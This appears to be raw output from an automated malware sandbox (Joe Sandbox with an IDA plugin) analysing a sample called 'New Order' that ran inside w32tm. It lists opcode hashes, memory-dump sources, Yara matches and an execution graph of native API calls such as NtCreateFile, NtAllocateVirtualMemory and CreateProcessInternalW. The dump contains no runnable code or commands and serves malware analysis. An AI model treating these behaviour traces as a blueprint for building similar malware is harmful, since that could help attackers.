                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                              • Opcode ID: fc84befe9f65b282780216f6e0de546cff02aca3d9c654cdebd83babac8a2ef2
                                                                                                                              • Instruction ID: 0304e0aac00d737d651a5ee1a3912e06fae77b245e1ac9ebac4b79ee349e6e36
                                                                                                                              • Opcode Fuzzy Hash: fc84befe9f65b282780216f6e0de546cff02aca3d9c654cdebd83babac8a2ef2
                                                                                                                              • Instruction Fuzzy Hash: 4B318472A012199FDB20DE2DCC80BEEB7F9EB44750F44055AE949E3200EB30AB458BA1
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-
                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                              • Instruction ID: 16b8bee1fe64caaf752099486a8fce251b4751ebada60b9f8e1509927acf0865
                                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                              • Instruction Fuzzy Hash: 0591B171E0021E9BEB24DF6DC880ABEBBA5FF45720F54461AE955E72C0EF349B408761
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $$@
                                                                                                                              • API String ID: 0-1194432280
                                                                                                                              • Opcode ID: 4131ee8efcb70f487cc04537e144ed6668b03d6befa63f2ad3d17f1594e00690
                                                                                                                              • Instruction ID: edfeba0cf8178264d4aefce5bf34fbe780d76d64a064d5afda95e1f3ea3a6657
                                                                                                                              • Opcode Fuzzy Hash: 4131ee8efcb70f487cc04537e144ed6668b03d6befa63f2ad3d17f1594e00690
                                                                                                                              • Instruction Fuzzy Hash: FD811C71D012699BDB768B58CC44BEAB7B9AB08714F0041DAEA1DF7281D7345F84CF61
                                                                                                                              APIs
                                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0188CFBD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallFilterFunc@8
                                                                                                                              • String ID: @$@4Cw@4Cw
                                                                                                                              • API String ID: 4062629308-3101775584
                                                                                                                              • Opcode ID: 82293d2cf59a051c0a64f17bf91e204a65f5738c00c49d1ce14284332e9d284a
                                                                                                                              • Instruction ID: 542f76c1b8317650ebd5ef511b4a375400ba1277e0d6bff219857660651e222a
                                                                                                                              • Opcode Fuzzy Hash: 82293d2cf59a051c0a64f17bf91e204a65f5738c00c49d1ce14284332e9d284a
                                                                                                                              • Instruction Fuzzy Hash: ED41A271900219DFDB21AF99C880AADBBB8FF55B14F10412EEE05EB254E774DA01CB62

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:2.6%
                                                                                                                              Dynamic/Decrypted Code Coverage:4%
                                                                                                                              Signature Coverage:1.5%
                                                                                                                              Total number of Nodes:474
                                                                                                                              Total number of Limit Nodes:76
                                                                                                                              execution_graph 98423 961550 98424 96156a 98423->98424 98425 964d50 LdrLoadDll 98424->98425 98426 961588 98425->98426 98427 9615bc PostThreadMessageW 98426->98427 98428 9615cd 98426->98428 98427->98428 98429 96b550 98434 96b260 98429->98434 98431 96b55d 98446 96aee0 98431->98446 98433 96b579 98435 96b285 98434->98435 98436 96b3d0 98435->98436 98456 973bb0 98435->98456 98436->98431 98438 96b3e7 98438->98431 98439 96b3de 98439->98438 98441 96b4d5 98439->98441 98471 96a930 98439->98471 98443 96b53a 98441->98443 98480 96aca0 98441->98480 98444 97be30 RtlFreeHeap 98443->98444 98445 96b541 98444->98445 98445->98431 98447 96aef6 98446->98447 98453 96af01 98446->98453 98448 97bf10 RtlAllocateHeap 98447->98448 98448->98453 98449 96af22 98449->98433 98450 96b232 98451 96b24b 98450->98451 98452 97be30 RtlFreeHeap 98450->98452 98451->98433 98452->98451 98453->98449 98453->98450 98454 96a930 RtlFreeHeap 98453->98454 98455 96aca0 RtlFreeHeap 98453->98455 98454->98453 98455->98453 98457 973bbe 98456->98457 98458 973bc5 98456->98458 98457->98439 98459 964d50 LdrLoadDll 98458->98459 98460 973bfa 98459->98460 98461 973c09 98460->98461 98484 973670 LdrLoadDll 98460->98484 98462 97bf10 RtlAllocateHeap 98461->98462 98467 973db7 98461->98467 98464 973c22 98462->98464 98465 973dad 98464->98465 98464->98467 98468 973c3e 98464->98468 98466 97be30 RtlFreeHeap 98465->98466 98465->98467 98466->98467 98467->98439 98468->98467 98469 97be30 RtlFreeHeap 98468->98469 98470 973da1 98469->98470 98470->98439 98472 96a956 98471->98472 98485 96e380 98472->98485 98474 96a9c8 98476 96ab50 98474->98476 98477 96a9e6 98474->98477 98475 96ab35 98475->98439 98476->98475 98479 96a7f0 RtlFreeHeap 98476->98479 98477->98475 98490 96a7f0 98477->98490 98479->98476 98481 96acc6 98480->98481 98482 96e380 RtlFreeHeap 98481->98482 98483 96ad4d 98482->98483 98483->98441 98484->98461 98487 96e3a4 98485->98487 98486 96e3b1 98486->98474 98487->98486 98488 97be30 RtlFreeHeap 98487->98488 98489 96e3f4 98488->98489 98489->98474 98491 96a80d 98490->98491 98494 96e410 98491->98494 98493 96a913 98493->98477 98495 96e434 98494->98495 98496 96e4de 98495->98496 98497 97be30 RtlFreeHeap 98495->98497 98496->98493 98497->98496 98498 971b51 98510 979ba0 98498->98510 98500 971ba5 98504 979d30 NtClose 98500->98504 98501 971b90 98503 979d30 NtClose 98501->98503 98502 971b72 98502->98500 98502->98501 98505 971b99 98503->98505 98507 971bae 98504->98507 98506 971be5 98507->98506 98508 97be30 RtlFreeHeap 98507->98508 98509 971bd9 98508->98509 98511 979c44 98510->98511 98513 979bc8 98510->98513 98512 979c5a NtReadFile 98511->98512 98512->98502 98513->98502 98060 979c90 98061 979d07 98060->98061 98063 979cbb 98060->98063 98062 979d1d NtDeleteFile 98061->98062 98514 971fd0 98515 971fec 98514->98515 98516 972014 98515->98516 98517 972028 98515->98517 98518 979d30 NtClose 98516->98518 98519 979d30 NtClose 98517->98519 98520 97201d 98518->98520 98521 972031 98519->98521 98524 97bf50 RtlAllocateHeap 98521->98524 98523 97203c 98524->98523 98064 95bc80 98067 97bda0 98064->98067 98066 95d2f1 98070 979ea0 98067->98070 98069 97bdd1 98069->98066 98071 979f32 98070->98071 98073 979ec8 98070->98073 98072 979f48 NtAllocateVirtualMemory 98071->98072 98072->98069 98073->98069 98526 959fc0 98527 959fcf 98526->98527 98528 95a010 98527->98528 98529 959ffd CreateThread 98527->98529 98074 96a400 98079 97bf10 98074->98079 98076 96a40e 98078 96a436 98076->98078 98082 97be30 98076->98082 98085 97a050 98079->98085 98081 97bf2b 98081->98076 98088 97a0a0 98082->98088 98084 97be49 98084->98078 98086 97a06d 98085->98086 98087 97a07e RtlAllocateHeap 98086->98087 98087->98081 98089 97a0bd 98088->98089 98090 97a0ce RtlFreeHeap 98089->98090 98090->98084 98091 96ce00 98093 96ce29 98091->98093 98092 96cf2d 98093->98092 98094 96ced3 FindFirstFileW 98093->98094 98094->98092 98096 96ceee 98094->98096 98095 96cf14 FindNextFileW 98095->98096 98097 96cf26 FindClose 98095->98097 98096->98095 98097->98092 98530 9663c0 98531 968900 LdrInitializeThunk 98530->98531 98532 9663f0 98530->98532 98531->98532 98535 968880 98532->98535 98534 966415 98536 9688c4 98535->98536 98541 9688e5 98536->98541 98542 979040 98536->98542 98538 9688f1 98538->98534 98539 9688d5 98539->98538 98540 979d30 NtClose 98539->98540 98540->98541 98541->98534 98543 9790ba 98542->98543 98544 979068 98542->98544 98547 33e4650 LdrInitializeThunk 98543->98547 98544->98539 98545 9790df 98545->98539 98547->98545 98548 967940 98549 96795c 98548->98549 98556 9679af 98548->98556 98551 979d30 NtClose 98549->98551 98549->98556 98550 967ae7 98552 967977 98551->98552 98558 966d60 NtClose LdrInitializeThunk LdrInitializeThunk 98552->98558 98554 967ac1 98554->98550 98560 966f30 NtClose LdrInitializeThunk LdrInitializeThunk 98554->98560 98556->98550 98559 966d60 NtClose LdrInitializeThunk LdrInitializeThunk 98556->98559 98558->98556 98559->98554 98560->98550 98098 970080 98099 9700e4 98098->98099 98127 966ad0 98099->98127 98101 97021e 98102 970217 98102->98101 98134 966be0 98102->98134 98104 9703c3 98105 97029a 98105->98104 98106 9703d2 98105->98106 98138 96fe60 98105->98138 98108 979d30 NtClose 98106->98108 98109 9703dc 98108->98109 98110 9702d6 98110->98106 98111 9702e1 98110->98111 98112 97bf10 RtlAllocateHeap 98111->98112 98113 97030a 98112->98113 98114 970313 98113->98114 98115 970329 98113->98115 98116 979d30 NtClose 98114->98116 98147 96fd50 CoInitialize 98115->98147 98118 97031d 98116->98118 98119 970337 98150 9797f0 98119->98150 98121 9703b2 98154 979d30 98121->98154 98123 9703bc 98124 97be30 RtlFreeHeap 98123->98124 98124->98104 98125 970355 98125->98121 98126 9797f0 LdrInitializeThunk 98125->98126 98126->98125 98128 966b03 98127->98128 98129 966b27 98128->98129 98157 9798a0 98128->98157 98129->98102 98131 979d30 NtClose 98133 966bca 98131->98133 98132 966b4a 98132->98129 98132->98131 98133->98102 98135 966c05 98134->98135 98162 979680 98135->98162 98139 96fe7c 98138->98139 98167 964d50 98139->98167 98141 96fea3 98141->98110 98142 96fe9a 98142->98141 98143 964d50 LdrLoadDll 98142->98143 98144 96ff6e 98143->98144 98145 964d50 LdrLoadDll 98144->98145 98146 96ffcb 98144->98146 98145->98146 98146->98110 98149 96fdb5 98147->98149 98148 96fe4b CoUninitialize 98148->98119 98149->98148 98151 97980d 98150->98151 98171 33e2ba0 LdrInitializeThunk 98151->98171 98152 97983d 98152->98125 98155 979d4d 98154->98155 98156 979d5e NtClose 98155->98156 98156->98123 98158 9798ba 98157->98158 98161 33e2ca0 LdrInitializeThunk 98158->98161 98159 9798e6 98159->98132 98161->98159 98163 97969a 98162->98163 98166 33e2c60 LdrInitializeThunk 98163->98166 98164 966c79 98164->98105 98166->98164 98168 964d74 98167->98168 98169 964d7b 98168->98169 98170 964db0 LdrLoadDll 98168->98170 98169->98142 98170->98169 98171->98152 98172 970980 98173 97099d 98172->98173 98174 964d50 LdrLoadDll 98173->98174 98175 9709bb 98174->98175 98576 962f4f 98577 966ad0 2 API calls 98576->98577 98578 962f73 98577->98578 98581 968b74 98582 968b91 98581->98582 98583 968b98 GetFileAttributesW 98582->98583 98584 968ba3 98583->98584 98585 9638f3 98586 968580 2 API calls 98585->98586 98587 963903 98586->98587 98588 96391f 98587->98588 98589 979d30 NtClose 98587->98589 98589->98588 98590 962a70 98591 979370 LdrInitializeThunk 98590->98591 98592 962aa6 98591->98592 98595 979dd0 98592->98595 98594 962abb 98596 979e5c 98595->98596 98597 979df8 98595->98597 98600 33e2e80 LdrInitializeThunk 98596->98600 98597->98594 98598 979e8d 98598->98594 98600->98598 98176 979a30 98177 979ae7 98176->98177 98179 979a5f 98176->98179 98178 979afd NtCreateFile 98177->98178 98180 97cf30 98181 97be30 RtlFreeHeap 98180->98181 98182 97cf45 98181->98182 98601 978c70 98602 978c8d 98601->98602 98603 978c9e RtlDosPathNameToNtPathName_U 98602->98603 98604 33e2ad0 LdrInitializeThunk 98183 969024 98185 969034 98183->98185 98184 968fe1 98185->98184 98187 9678c0 98185->98187 98188 9678d6 98187->98188 98190 96790f 98187->98190 98188->98190 98191 967730 LdrLoadDll 98188->98191 98190->98184 98191->98190 98192 95a020 98193 95a4f7 98192->98193 98195 95a9c4 98193->98195 98196 97ba70 98193->98196 98197 97ba94 98196->98197 98202 954270 98197->98202 98199 97bab3 98200 97baec 98199->98200 98205 975e70 98199->98205 98200->98195 98209 963a00 98202->98209 98204 95427d 98204->98199 98206 975ed2 98205->98206 98208 975edf 98206->98208 98227 962190 98206->98227 98208->98200 98210 963a1d 98209->98210 98212 963a36 98210->98212 98213 97a780 98210->98213 98212->98204 98214 97a79a 98213->98214 98215 97a7c9 98214->98215 98220 979370 98214->98220 98215->98212 98218 97be30 RtlFreeHeap 98219 97a842 98218->98219 98219->98212 98221 97938a 98220->98221 98224 33e2c0a 98221->98224 98222 9793b6 98222->98218 98225 33e2c1f LdrInitializeThunk 98224->98225 98226 33e2c11 98224->98226 98225->98222 98226->98222 98228 9621cb 98227->98228 98243 968690 98228->98243 98230 9621d3 98231 97bf10 RtlAllocateHeap 98230->98231 98242 9624b6 98230->98242 98232 9621e9 98231->98232 98233 97bf10 RtlAllocateHeap 98232->98233 98234 9621fa 98233->98234 98235 97bf10 RtlAllocateHeap 98234->98235 98236 96220b 98235->98236 98238 9622a8 98236->98238 98258 967230 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98236->98258 98239 964d50 LdrLoadDll 98238->98239 98240 962462 98239->98240 98254 9787b0 98240->98254 98242->98208 98244 9686bc 98243->98244 98259 968580 98244->98259 98247 968701 98250 96871d 98247->98250 98252 979d30 NtClose 98247->98252 98248 9686e9 98249 9686f4 98248->98249 98251 979d30 NtClose 98248->98251 98249->98230 98250->98230 98251->98249 98253 968713 98252->98253 98253->98230 98255 978812 98254->98255 98257 97881f 98255->98257 98270 9624d0 98255->98270 98257->98242 98258->98238 98261 968581 98259->98261 98260 968676 98260->98247 98260->98248 98261->98260 98265 979410 98261->98265 98264 979d30 NtClose 98264->98260 98266 97942d 98265->98266 98269 33e35c0 LdrInitializeThunk 98266->98269 98267 96866a 98267->98264 98269->98267 98288 968960 98270->98288 98272 962a56 98272->98257 98273 9624f0 98273->98272 98292 971990 98273->98292 98276 96270a 98301 97d000 98276->98301 98277 96254e 98277->98272 98296 97ced0 98277->98296 98280 9760e0 LdrInitializeThunk 98283 96276c 98280->98283 98281 96271f 98281->98283 98307 960fe0 98281->98307 98283->98272 98283->98280 98284 960fe0 LdrInitializeThunk 98283->98284 98314 968900 98283->98314 98284->98283 98286 9628c0 98286->98283 98287 968900 LdrInitializeThunk 98286->98287 98310 9760e0 98286->98310 98287->98286 98289 96896d 98288->98289 98290 968995 98289->98290 98291 96898e SetErrorMode 98289->98291 98290->98273 98291->98290 98293 97199d 98292->98293 98294 97bda0 NtAllocateVirtualMemory 98293->98294 98295 9719b1 98294->98295 98295->98277 98297 97cee6 98296->98297 98298 97cee0 98296->98298 98299 97bf10 RtlAllocateHeap 98297->98299 98298->98276 98300 97cf0c 98299->98300 98300->98276 98302 97cf70 98301->98302 98303 97cfcd 98302->98303 98304 97bf10 RtlAllocateHeap 98302->98304 98303->98281 98305 97cfaa 98304->98305 98306 97be30 RtlFreeHeap 98305->98306 98306->98303 98308 961002 98307->98308 98318 979fc0 98307->98318 98308->98286 98311 976142 98310->98311 98313 976153 98311->98313 98323 9680b0 98311->98323 98313->98286 98315 968913 98314->98315 98327 979270 98315->98327 98317 96893e 98317->98283 98319 979fda 98318->98319 98322 33e2c70 LdrInitializeThunk 98319->98322 98320 97a002 98320->98308 98322->98320 98325 967fe0 98323->98325 98326 9680a1 98323->98326 98324 960fe0 LdrInitializeThunk 98324->98326 98325->98324 98325->98326 98326->98313 98328 9792ee 98327->98328 98329 97929b 98327->98329 98332 33e2dd0 LdrInitializeThunk 98328->98332 98329->98317 98330 979313 98330->98317 98332->98330 98333 9675a0 98334 9675ca 98333->98334 98337 968730 98334->98337 98336 9675f4 98338 96874d 98337->98338 98344 979460 98338->98344 98340 96879d 98341 9687a4 98340->98341 98349 979540 98340->98349 98341->98336 98343 9687cd 98343->98336 98345 979488 98344->98345 98346 9794f8 98344->98346 98345->98340 98354 33e2f30 LdrInitializeThunk 98346->98354 98347 979531 98347->98340 98350 9795ee 98349->98350 98352 97956c 98349->98352 98355 33e2d10 LdrInitializeThunk 98350->98355 98351 979633 98351->98343 98352->98343 98354->98347 98355->98351 98356 967b20 98357 967b92 98356->98357 98358 967b38 98356->98358 98358->98357 98360 96ba80 98358->98360 98361 96baa6 98360->98361 98362 96bcdf 98361->98362 98387 97a130 98361->98387 98362->98357 98364 96bb22 98364->98362 98365 97d000 2 API calls 98364->98365 98366 96bb41 98365->98366 98366->98362 98367 96bc18 98366->98367 98368 979370 LdrInitializeThunk 98366->98368 98369 966340 LdrInitializeThunk 98367->98369 98371 96bc37 98367->98371 98370 96bba3 98368->98370 98369->98371 98370->98367 98374 96bbac 98370->98374 98375 96bcc7 98371->98375 98393 978ee0 98371->98393 98372 96bc00 98376 968900 LdrInitializeThunk 98372->98376 98373 96bbde 98408 974ff0 LdrInitializeThunk 98373->98408 98374->98362 98374->98372 98374->98373 98390 966340 98374->98390 98377 968900 LdrInitializeThunk 98375->98377 98381 96bc0e 98376->98381 98382 96bcd5 98377->98382 98381->98357 98382->98357 98383 96bc9e 98398 978f90 98383->98398 98385 96bcb8 98403 9790f0 98385->98403 98388 97a14a 98387->98388 98389 97a15b CreateProcessInternalW 98388->98389 98389->98364 98391 979540 LdrInitializeThunk 98390->98391 98392 96637e 98390->98392 98391->98392 98392->98373 98394 978f5d 98393->98394 98396 978f0b 98393->98396 98409 33e39b0 LdrInitializeThunk 98394->98409 98395 978f82 98395->98383 98396->98383 98399 97900d 98398->98399 98401 978fbb 98398->98401 98410 33e4340 LdrInitializeThunk 98399->98410 98400 979032 98400->98385 98401->98385 98404 97916a 98403->98404 98405 979118 98403->98405 98411 33e2fb0 LdrInitializeThunk 98404->98411 98405->98375 98406 97918f 98406->98375 98408->98372 98409->98395 98410->98400 98411->98406 98412 9791a0 98413 97922f 98412->98413 98414 9791cb 98412->98414 98417 33e2ee0 LdrInitializeThunk 98413->98417 98415 979260 98417->98415 98418 979320 98419 97933d 98418->98419 98422 33e2df0 LdrInitializeThunk 98419->98422 98420 979365 98422->98420 98605 9768e0 98606 97693a 98605->98606 98608 976947 98606->98608 98609 9742f0 98606->98609 98610 97bda0 NtAllocateVirtualMemory 98609->98610 98611 974331 98610->98611 98612 964d50 LdrLoadDll 98611->98612 98614 97443e 98611->98614 98615 974377 98612->98615 98613 9743c0 Sleep 98613->98615 98614->98608 98615->98613 98615->98614 98616 972360 98621 972379 98616->98621 98617 97240c 98618 9723c4 98619 97be30 RtlFreeHeap 98618->98619 98620 9723d4 98619->98620 98621->98617 98621->98618 98622 972407 98621->98622 98623 97be30 RtlFreeHeap 98622->98623 98623->98617 98624 9722e9 98625 972312 98624->98625 98626 9722ef 98624->98626 98627 979d30 NtClose 98625->98627 98626->98625 98629 9722f4 98626->98629 98628 972319 98627->98628 98632 976200 98629->98632 98631 972308 98633 976264 98632->98633 98634 97629b 98633->98634 98637 971a00 98633->98637 98634->98631 98636 97627d 98636->98631 98639 97199d 98637->98639 98638 97bda0 NtAllocateVirtualMemory 98641 9719b1 98638->98641 98639->98637 98639->98638 98640 971a76 98639->98640 98641->98636
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 0096CEE4
                                                                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 0096CF1F
                                                                                                                              • FindClose.KERNELBASE(?), ref: 0096CF2A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3541575487-0
                                                                                                                              • Opcode ID: 29793147d933fe40f9b59ac61c705eaeae162119922a1950e09688fb18dd4ba2
                                                                                                                              • Instruction ID: a50810b0071455e0fdcf266727d1ef5486118750e6d83c82c0f02434c454decd
                                                                                                                              • Opcode Fuzzy Hash: 29793147d933fe40f9b59ac61c705eaeae162119922a1950e09688fb18dd4ba2
                                                                                                                              • Instruction Fuzzy Hash: E73150B2900248BBDB20DFA4CC86FFF777CDF84715F544558BA48A7191DA74AA848BA0
                                                                                                                              APIs
                                                                                                                              • NtCreateFile.NTDLL(?,?,99DBCB70,?,?,?,?,?,?,?,?), ref: 00979B2E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 823142352-0
                                                                                                                              • Opcode ID: 6d433a8723dea39743f0cb02000f721a275543db99a97d44697a1fbe081a58b6
                                                                                                                              • Instruction ID: ab8386f96f06d43770a9bc57198d4eae01b2518b97bc1b445a59303d0ba2b597
                                                                                                                              • Opcode Fuzzy Hash: 6d433a8723dea39743f0cb02000f721a275543db99a97d44697a1fbe081a58b6
                                                                                                                              • Instruction Fuzzy Hash: F731D4B5A01248AFCB14DF98D881EEFB7B9FF88314F108209F919A7340D730A941CBA5
                                                                                                                              APIs
                                                                                                                              • NtReadFile.NTDLL(?,?,99DBCB70,?,?,?,?,?,?), ref: 00979C83
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2738559852-0
                                                                                                                              • Opcode ID: db79748290b7137ead48da5667c266fd8f65f50ec5e9e041be0b1115778f5e54
                                                                                                                              • Instruction ID: 47f05a7ebee06301d972275ccf30d9d839f26994614418c947fd198b1f7e884e
                                                                                                                              • Opcode Fuzzy Hash: db79748290b7137ead48da5667c266fd8f65f50ec5e9e041be0b1115778f5e54
                                                                                                                              • Instruction Fuzzy Hash: 0B31E7B5A00248AFDB14DF98D881EEEB7B9EF88314F108209F919A7345D770A911CFA5
                                                                                                                              APIs
                                                                                                                              • NtAllocateVirtualMemory.NTDLL(0096254E,?,99DBCB70,00000000,00000004,00003000,?,?,?,?,?,0097881F,0096254E), ref: 00979F65
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2167126740-0
                                                                                                                              • Opcode ID: e919035b397d3f590f68ef98e4c4d41492dc07bbc1936208019ea466cd353210
                                                                                                                              • Instruction ID: 00f5e26e40a526dc45bf2da2bf717bfb4e7b77695dcc460e1fb6a61803794c2b
                                                                                                                              • Opcode Fuzzy Hash: e919035b397d3f590f68ef98e4c4d41492dc07bbc1936208019ea466cd353210
                                                                                                                              • Instruction Fuzzy Hash: BF21E8B5A10208ABDB10DFA8DC81FAF77B9FF88714F108119F919A7241D774A911CBA5
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DeleteFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4033686569-0
                                                                                                                              • Opcode ID: 0ed73472e3161a74703de569612a60cca9d8b2aab1adf9b0db8315a4c0e2a01e
                                                                                                                              • Instruction ID: 5e24ef2c428024cef961f03b5ae23559a324c4a3b9856c45e3e8f28036b6c208
                                                                                                                              • Opcode Fuzzy Hash: 0ed73472e3161a74703de569612a60cca9d8b2aab1adf9b0db8315a4c0e2a01e
                                                                                                                              • Instruction Fuzzy Hash: E8115172600208AAD720EB64DC42FAF736DEFC5714F108109FA0CA7281D77179158BE6
                                                                                                                              APIs
                                                                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00979D67
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Close
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3535843008-0
                                                                                                                              • Opcode ID: e2f605f68d8ee9bbccc42c1446b5379a1ac774e33873eff665959624751413d0
                                                                                                                              • Instruction ID: a9a6ec031d2127e2ce792c296d1b14a66b0ccc5025fa7b6fc2adcff303f878d1
                                                                                                                              • Opcode Fuzzy Hash: e2f605f68d8ee9bbccc42c1446b5379a1ac774e33873eff665959624751413d0
                                                                                                                              • Instruction Fuzzy Hash: D9E08C722402047BC220EB5ACC41FABB76DEFC57A4F408019FA0CA7242DA70BE0187F5
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: bf0eaf44d171245591daa8b5db1304261cbb46635ab522d4ac4b8823aec78e5b
                                                                                                                              • Instruction ID: f5b7e1f9eece2f626c7aefe0823c5b77081381747df8a5b0fd1d1e0402e7ca87
                                                                                                                              • Opcode Fuzzy Hash: bf0eaf44d171245591daa8b5db1304261cbb46635ab522d4ac4b8823aec78e5b
                                                                                                                              • Instruction Fuzzy Hash: 09900235615804169944B15C48C45464005D7E1301B95C111E1424954C8B14CA665361
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: f3162754f7108768ece64a0918b35b22f119e8e5367192ea563ad7b4b825fadf
                                                                                                                              • Instruction ID: fcbeba497111f4679e392e8c6b627cf20798e50f42b10aed1a8bb7471e92af99
                                                                                                                              • Opcode Fuzzy Hash: f3162754f7108768ece64a0918b35b22f119e8e5367192ea563ad7b4b825fadf
                                                                                                                              • Instruction Fuzzy Hash: 9E900265611504464944B15C48444066005D7E23013D5C215A1554960C8718C9659269
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
